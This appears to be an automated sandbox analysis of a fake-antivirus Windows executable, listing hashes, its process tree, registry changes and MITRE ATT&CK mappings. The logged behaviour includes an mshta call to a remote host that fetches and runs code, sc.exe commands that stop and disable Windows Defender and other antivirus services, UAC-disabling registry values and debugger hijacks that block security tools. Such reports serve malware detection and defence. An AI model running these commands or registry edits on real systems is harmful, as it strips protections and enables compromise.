Analysis
-
max time kernel
150s -
max time network
126s -
platform
windows10-2004_x64 -
resource
win10v2004-20240221-en -
resource tags
arch:x64arch:x86image:win10v2004-20240221-enlocale:en-usos:windows10-2004-x64system -
submitted
24-02-2024 09:02
Static task
static1
Behavioral task
behavioral1
Sample
a178083977255560a5e3b886e4f79ce7.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
a178083977255560a5e3b886e4f79ce7.exe
Resource
win10v2004-20240221-en
General
-
Target
a178083977255560a5e3b886e4f79ce7.exe
-
Size
2.0MB
-
MD5
a178083977255560a5e3b886e4f79ce7
-
SHA1
9c59fec6a7d2559db0566ef5adc93740dcc67bad
-
SHA256
9da45c1414fde84e01fbe21e66ab691b1201aaa24c72f8575f5dec3f0fbd23b8
-
SHA512
1136f7e5bd5f062fe1249db4d8bddab33f848bb3c901bcde1cdf33f0f7761f104156e5799c64b4e65cf2235d404b1114a246faac5a811b992b222387f80942af
-
SSDEEP
49152:Dtq2uoGFcKkmE7BRCp4u3e3S5y1Shi35U0thsf:Dduo4cKkmISZe371SgJB4
Malware Config
Extracted
http://galaint.coolsecupdate.info/?0=154&1=1&2=1&3=38&4=i&5=9200&6=6&7=2&8=919041&9=1033&10=0&11=0000&12=yvcpifbvek&14=1
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Protector-pffo.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" Protector-pffo.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" Protector-pffo.exe -
Disables taskbar notifications via registry modification
-
Sets file execution options in registry 2 TTPs 64 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pcip10117_0.exe\Debugger = "svchost.exe" Protector-pffo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\programauditor.exe\Debugger = "svchost.exe" Protector-pffo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Save.exe Protector-pffo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\scrscan.exe\Debugger = "svchost.exe" Protector-pffo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\shn.exe\Debugger = "svchost.exe" Protector-pffo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\spoler.exe Protector-pffo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcagent.exe\Debugger = "svchost.exe" Protector-pffo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pav.exe\Debugger = "svchost.exe" Protector-pffo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kerio-pf-213-en-win.exe\Debugger = "svchost.exe" Protector-pffo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lsetup.exe\Debugger = "svchost.exe" Protector-pffo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\spywarexpguard.exe Protector-pffo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vbwin9x.exe Protector-pffo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AAWTray.exe Protector-pffo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AntivirusPlus Protector-pffo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iedll.exe\Debugger = "svchost.exe" Protector-pffo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msccn32.exe Protector-pffo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\support.exe Protector-pffo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\aswUpdSv.exe\Debugger = "svchost.exe" Protector-pffo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iedll.exe Protector-pffo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AntivirusXP.exe Protector-pffo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashDisp.exe\Debugger = "svchost.exe" Protector-pffo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avkservice.exe Protector-pffo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avkwctl9.exe Protector-pffo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\divx.exe\Debugger = "svchost.exe" Protector-pffo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dop.exe\Debugger = "svchost.exe" Protector-pffo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mapisvc32.exe Protector-pffo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mctool.exe Protector-pffo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nvc95.exe Protector-pffo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sgssfw32.exe\Debugger = "svchost.exe" Protector-pffo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sphinx.exe Protector-pffo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tds-3.exe Protector-pffo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tsadbot.exe Protector-pffo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winactive.exe Protector-pffo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MPFSrv.exe\Debugger = "svchost.exe" Protector-pffo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mssys.exe\Debugger = "svchost.exe" Protector-pffo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ibmasn.exe Protector-pffo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netspyhunter-1.2.exe\Debugger = "svchost.exe" Protector-pffo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vet32.exe Protector-pffo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\zapro.exe\Debugger = "svchost.exe" Protector-pffo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AntivirusPro_2010.exe\Debugger = "svchost.exe" Protector-pffo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\hbinst.exe\Debugger = "svchost.exe" Protector-pffo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bspatch.exe\Debugger = "svchost.exe" Protector-pffo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\keenvalue.exe\Debugger = "svchost.exe" Protector-pffo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ldpromenu.exe\Debugger = "svchost.exe" Protector-pffo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notstart.exe\Debugger = "svchost.exe" Protector-pffo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sweepnet.sweepsrv.sys.swnetsup.exe\Debugger = "svchost.exe" Protector-pffo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\watchdog.exe Protector-pffo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcsysmon.exe\Debugger = "svchost.exe" Protector-pffo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bipcp.exe Protector-pffo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pf2.exe\Debugger = "svchost.exe" Protector-pffo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashServ.exe\Debugger = "svchost.exe" Protector-pffo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgcmgr.exe\Debugger = "svchost.exe" Protector-pffo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bootwarn.exe Protector-pffo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\firewall.exe\Debugger = "svchost.exe" Protector-pffo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\gator.exe\Debugger = "svchost.exe" Protector-pffo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mscman.exe Protector-pffo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tvmd.exe Protector-pffo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\W3asbas.exe\Debugger = "svchost.exe" Protector-pffo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgemc.exe\Debugger = "svchost.exe" Protector-pffo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avkpop.exe Protector-pffo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\system.exe Protector-pffo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\whoswatchingme.exe\Debugger = "svchost.exe" Protector-pffo.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\hxdl.exe Protector-pffo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\spyxx.exe\Debugger = "svchost.exe" Protector-pffo.exe -
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2132103209-3755304320-2959162027-1000\Control Panel\International\Geo\Nation o4ib9o461wv8827.exe Key value queried \REGISTRY\USER\S-1-5-21-2132103209-3755304320-2959162027-1000\Control Panel\International\Geo\Nation 4epu7913jyq24zg.exe Key value queried \REGISTRY\USER\S-1-5-21-2132103209-3755304320-2959162027-1000\Control Panel\International\Geo\Nation a178083977255560a5e3b886e4f79ce7.exe -
Executes dropped EXE 3 IoCs
pid Process 4848 o4ib9o461wv8827.exe 2088 4epu7913jyq24zg.exe 1116 Protector-pffo.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2132103209-3755304320-2959162027-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Inspector = "C:\\Users\\Admin\\AppData\\Roaming\\Protector-pffo.exe" Protector-pffo.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Protector-pffo.exe -
Drops file in System32 directory 3 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\services.msc Protector-pffo.exe File opened for modification C:\Windows\SysWOW64\eventvwr.msc Protector-pffo.exe File opened for modification C:\Windows\SysWOW64\diskmgmt.msc Protector-pffo.exe -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4724 sc.exe 4144 sc.exe 4092 sc.exe 2800 sc.exe 3936 sc.exe 1632 sc.exe 4648 sc.exe 724 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE ERROR PAGE BYPASS ZONE CHECK FOR HTTPS KB954312 Protector-pffo.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE ERROR PAGE BYPASS ZONE CHECK FOR HTTPS KB954312\iexplore.exe = "1" Protector-pffo.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2088 4epu7913jyq24zg.exe Token: SeShutdownPrivilege 2088 4epu7913jyq24zg.exe Token: SeDebugPrivilege 1116 Protector-pffo.exe Token: SeShutdownPrivilege 1116 Protector-pffo.exe -
Suspicious use of FindShellTrayWindow 6 IoCs
pid Process 2088 4epu7913jyq24zg.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe -
Suspicious use of SendNotifyMessage 4 IoCs
pid Process 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 2088 4epu7913jyq24zg.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe 1116 Protector-pffo.exe -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 3548 wrote to memory of 4848 3548 a178083977255560a5e3b886e4f79ce7.exe 89 PID 3548 wrote to memory of 4848 3548 a178083977255560a5e3b886e4f79ce7.exe 89 PID 3548 wrote to memory of 4848 3548 a178083977255560a5e3b886e4f79ce7.exe 89 PID 4848 wrote to memory of 2088 4848 o4ib9o461wv8827.exe 90 PID 4848 wrote to memory of 2088 4848 o4ib9o461wv8827.exe 90 PID 4848 wrote to memory of 2088 4848 o4ib9o461wv8827.exe 90 PID 2088 wrote to memory of 1116 2088 4epu7913jyq24zg.exe 91 PID 2088 wrote to memory of 1116 2088 4epu7913jyq24zg.exe 91 PID 2088 wrote to memory of 1116 2088 4epu7913jyq24zg.exe 91 PID 2088 wrote to memory of 2456 2088 4epu7913jyq24zg.exe 92 PID 2088 wrote to memory of 2456 2088 4epu7913jyq24zg.exe 92 PID 2088 wrote to memory of 2456 2088 4epu7913jyq24zg.exe 92 PID 1116 wrote to memory of 1284 1116 Protector-pffo.exe 94 PID 1116 wrote to memory of 1284 1116 Protector-pffo.exe 94 PID 1116 wrote to memory of 1284 1116 Protector-pffo.exe 94 PID 1116 wrote to memory of 4144 1116 Protector-pffo.exe 98 PID 1116 wrote to memory of 4144 1116 Protector-pffo.exe 98 PID 1116 wrote to memory of 4144 1116 Protector-pffo.exe 98 PID 1116 wrote to memory of 2800 1116 Protector-pffo.exe 101 PID 1116 wrote to memory of 2800 1116 Protector-pffo.exe 101 PID 1116 wrote to memory of 2800 1116 Protector-pffo.exe 101 PID 1116 wrote to memory of 4092 1116 Protector-pffo.exe 100 PID 1116 wrote to memory of 4092 1116 Protector-pffo.exe 100 PID 1116 wrote to memory of 4092 1116 Protector-pffo.exe 100 PID 1116 wrote to memory of 3936 1116 Protector-pffo.exe 102 PID 1116 wrote to memory of 3936 1116 Protector-pffo.exe 102 PID 1116 wrote to memory of 3936 1116 Protector-pffo.exe 102 PID 1116 wrote to memory of 1632 1116 Protector-pffo.exe 103 PID 1116 wrote to memory of 1632 1116 Protector-pffo.exe 103 PID 1116 wrote to memory of 1632 1116 Protector-pffo.exe 103 PID 1116 wrote to memory of 4724 1116 Protector-pffo.exe 111 PID 1116 wrote to memory of 4724 1116 Protector-pffo.exe 111 PID 1116 wrote to memory of 4724 1116 Protector-pffo.exe 111 PID 1116 wrote to memory of 724 1116 Protector-pffo.exe 109 PID 1116 wrote to memory of 724 1116 Protector-pffo.exe 109 PID 1116 wrote to memory of 724 1116 Protector-pffo.exe 109 PID 1116 wrote to memory of 4648 1116 Protector-pffo.exe 104 PID 1116 wrote to memory of 4648 1116 Protector-pffo.exe 104 PID 1116 wrote to memory of 4648 1116 Protector-pffo.exe 104 -
System policy modification 1 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System Protector-pffo.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Protector-pffo.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" Protector-pffo.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" Protector-pffo.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\a178083977255560a5e3b886e4f79ce7.exe"C:\Users\Admin\AppData\Local\Temp\a178083977255560a5e3b886e4f79ce7.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3548 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\o4ib9o461wv8827.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\o4ib9o461wv8827.exe" -e -p7yit6hq0c534ln62⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4848 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\4epu7913jyq24zg.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\4epu7913jyq24zg.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2088 -
C:\Users\Admin\AppData\Roaming\Protector-pffo.exeC:\Users\Admin\AppData\Roaming\Protector-pffo.exe4⤵
- UAC bypass
- Sets file execution options in registry
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in System32 directory
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1116 -
C:\Windows\SysWOW64\mshta.exemshta.exe "http://galaint.coolsecupdate.info/?0=154&1=1&2=1&3=38&4=i&5=9200&6=6&7=2&8=919041&9=1033&10=0&11=0000&12=yvcpifbvek&14=1"5⤵PID:1284
-
-
C:\Windows\SysWOW64\sc.exesc stop WinDefend5⤵
- Launches sc.exe
PID:4144
-
-
C:\Windows\SysWOW64\sc.exesc stop msmpsvc5⤵
- Launches sc.exe
PID:4092
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled5⤵
- Launches sc.exe
PID:2800
-
-
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled5⤵
- Launches sc.exe
PID:3936
-
-
C:\Windows\SysWOW64\sc.exesc config ekrn start= disabled5⤵
- Launches sc.exe
PID:1632
-
-
C:\Windows\SysWOW64\sc.exesc config AntiVirSchedulerService start= disabled5⤵
- Launches sc.exe
PID:4648
-
-
C:\Windows\SysWOW64\sc.exesc config AntiVirService start= disabled5⤵
- Launches sc.exe
PID:724
-
-
C:\Windows\SysWOW64\sc.exesc stop AntiVirService5⤵
- Launches sc.exe
PID:4724
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\4EPU79~1.EXE" >> NUL4⤵PID:2456
-
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
1Windows Service
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
1Windows Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.0MB
MD58c03b4dc54244014229009d42e7c0455
SHA18df39a19d4601daf554143815b6afa3286904a7d
SHA256012a675100f650f93436b0c226652b335db207b9ba04331d9d0513c975bb9010
SHA512bbd9573f14411dd23689e103e2ba75bfc89b481e540450ba47fd1550b088177efedd5918713ebab9776b89a57a82f28ba9784785fcc22fc86e180aeb70724d08
-
Filesize
1.9MB
MD5bfd99e635288e5e0f46f0e7aa150300c
SHA117b31bc6d8a5ca2c065fbaf3e1c755cf68ffd37b
SHA256969006837a0889f09181454819b7a27d89ca11330b628d3faf56a3e46022fd01
SHA512c806add828107536f463d3103be1907ddbe653a25fbf0e785dc69c2e9a52b76927a2d3efa6d509b85b97fa9710a3156273ee5c914f3365c5e854c6073da704cc